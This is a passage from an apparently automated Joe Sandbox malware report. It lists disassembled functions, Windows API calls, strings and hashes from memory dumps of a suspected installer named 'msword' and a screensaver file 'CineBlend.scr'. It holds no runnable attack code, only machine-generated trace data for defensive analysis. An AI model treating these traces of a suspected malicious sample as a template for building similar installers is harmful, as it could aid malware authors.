lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Section: "%s", xrefs: 004050A5
Skipping section: "%s", xrefs: 004050E1

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: CineBlend.scrPID: 1056, Parent PID: 7180COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	65

Executed Functions

Function 00B45FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B45FF7

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

GetCurrentProcess.KERNEL32(?,00BDDC2C,00000000,?,?), ref: 00B46123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B4612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B46155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B46167
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B46175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B4617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00B461A1

Strings

kernel32.dll, xrefs: 00B46150
|O, xrefs: 00B850F7
GetNativeSystemInfo, xrefs: 00B46161

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3fff9e90d93e477a39aba9c1f86bb2f825f509a4441e382e78b7c6486b2f0413
